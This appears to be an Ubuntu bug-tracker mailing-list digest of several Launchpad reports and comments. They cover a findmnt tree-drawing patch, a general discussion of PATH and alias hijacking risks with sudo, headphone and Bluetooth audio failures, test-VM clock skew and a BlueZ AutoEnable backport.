findmnt: libsmartcols ASCII art problem [patch]

Status in util-linux package in Ubuntu:
  Fix Released

Bug description:
The libsmartcols component used by findmnt to draw the filesystem tree
is smart enough to wrap lines in case the output doesn’t fit into the
screen. However, it fails to draw the lines correctly in this case.
Attached patch fixes the problem. Someone more knowledgeable in
libsmartcols internals might want to change the buffer size from an
arbitrary 1024 to something taken from actual data, the best way to do
  that eludes me.

  Sample of incorrect output:

  --%<
  ├─/boot /dev/sda1 ext3
rw,relatime,data=ordered
  ├─/usr /dev/mapper/vgshadow-ubuntu_usr
  ext4
rw,noatime,data=ordered
  ├─/var /dev/mapper/vgshadow-ubuntu_var
  ext4
rw,noatime,data=ordered
  ├─/home /dev/mapper/vgshadow-home
  ext4
rw,noatime,data=ordered
  └─/srv /dev/mapper/vgshadow-srv
  reiserfs
rw,noatime,notail
  --%<

Patch adds missing vertical lines at any level necessary.

[Touch-packages] [Bug 1893241] Re: attack alias sudo with nasty payload

2020-08-29 Thread Patrik Nilsson
@seth-arnold

I agree with you that there are other things to address as well.

In the art of hacking you most probably get into a system via some kind
of service. You maybe have the privileges of a daemon. You then get an
access to the first user account. You want to escalate privilege and you
search to find weaknesses. As a system owner you want as many layers of
protection as possible.

It is a weakness that the PATH-variable can be set without given your
password, since an attacker can set their evil command before the one
you expect in the execution priority.

The same comes to the ALIAS-command. As demonstrated, they can help
compromise your system.

So you are right there were more things to think about, but we all want
a system as safe as possible.

[Touch-packages] [Bug 1583801] Re: No sound via headphones (headset) when Ubuntu boots with them plugged in

2020-08-29 Thread Bastián Muñoz
I believe it's not a Dell-only problem. I have an HP Omen 15-ax201la
Gaming Laptop with dual-boot and have the same problem: if I boot with
headphones/speaker connected then there won't be any sound; if I plug
out, no sound; then if I plug back in the sound comes back.

[Touch-packages] [Bug 1880839] Re: Clock skew on testbeds

2020-08-29 Thread Balint Reczey
We have a few options to fix the issue. The one I'd prefer would be
switching to systemd to depend on chrony as the preferred time-daemon
because timesynd turns back time and that can cause issues like this
one.

An other option is disabling systemd-timesyncd in the test VMs, that
would make the tests more reproducible but less similar to real
installations's behavour.

[Touch-packages] [Bug 1878194] Re: [Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting HSP/HFP audio profile in Focal Fossa

Headphones not working with HFP profile.

Title:
[Sennheiser HD 4.50 BTNC] Bluetooth headset not working when selecting
HSP/HFP audio profile in Focal Fossa

Status in bluez package in Ubuntu:
  Confirmed
Status in pulseaudio package in Ubuntu:
  Confirmed

Bug description:
After updating the release from Ubuntu 19.10 to 20.04, the bluetooth
headset doesn't work anymore when HSP/HFP profile is selected.

With Ubuntu 19.10 the headset was working, there was audio and the mic
  was perfect for video conferencing.

  [Steps to reproduce]
  1. Connect headset (used blueman to setup and connect)
1.1. When connected the system automatically selects A2DP profile
  2. Start playing audio (browser or other)
  3. Change profile to HSP/HFP with pavucontrol (or blueman)
  4. The audio disappears and microphone is not working (no input)
  5. Optionally switch back to A2DP and the audio comes back

  [Expected]
When switching to HSP/HFP the audio should keep playing and the microphone
should start working

  [Notes]
I tried with pavucontrol to switch between profiles while playing audio from
a browser.
As side note there's a led in the headset that still blinks when switching
profile.

I tried deleting the pulse folder under user's profile .config without
success, also reinstalled packages and did a `sudo alsa force-reload`
  and rebooting several times.

Note: not sure this is a duplicate of [Bug #1576559], it looks quite
different since the profile changes but the headset stops working.

  [System info]
  Ubuntu: 20.04 - Linux 5.4.0-29-generic x86_64
  pulseaudio: 1:13.99.1-1ubuntu3
  bluez: 5.53-0ubuntu3

  Headset: Sennheiser HD 4.50 BTNC

Title:
  Bluetooth LE pairing fail

Status in OEM Priority Project:
  Won't Fix
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Xenial:
  Won't Fix

Bug description:
  [Impact]

When the Bluetooth adapter is not powered on it is not possible to use
it in normal way. We used to have a hack to force powering on by using
an udev rule but this doe snot work anymore. Luckily the BlueZ has
introduced "AutoEnable" option that makes the stack power on adapters by
  itself.

Backporting this to xenial will improve life of the desktop users and
will not require them to hack the solution on their own. The fix itself
uses the well known solution to this problem that is floating around
  there for a while.

The upload fixes the bug by enabling the 'AutoEnable' option in the
  bluetoothd config file.

  [Original Report]

. 15.10 we now have bluez 5 so we can pair BLE devices like the
  Microsoft Arc Touch Bluetooth Mouse.

But this pairing doesn't work very well. Mouse is seen but pairing fail.
  More information: https://bugzilla.kernel.org/show_bug.cgi?id=104011#c5

This is due to udev rule that use "hcitool" to power on device.
Hopefully, bluez 5.35 has a new parameter "AutoEnable" who can be used
  instead of udev rules.

here is a commit with this parameter:
  http://bazaar.launchpad.net/~guilhem-fr/bluez/autoenable/revision/138

  [Test Case]

  On xenial install from ppa:
  https://launchpad.net/~bluetooth/+archive/ubuntu/bluez

Now reboot the machine. The BT adapter shall be
  powered on.

  [Regression Potential]

If things go wrong the adapter will not be powered on after the system
boots up. Therefore while testing please focus on the adapter state,
  i.e. powered on or off.

  [Other Info]

This fix is included in the development release, see:
  http://bazaar.launchpad.net/~bluetooth/bluez/ubuntu-zesty/revision/22

  [What to upload]

  For xenial as in:

  )
https://launchpadlibrarian.net/347480725/bluez_5.37-0ubuntu5_5.37-0ubuntu5.2~build1.diff.gz
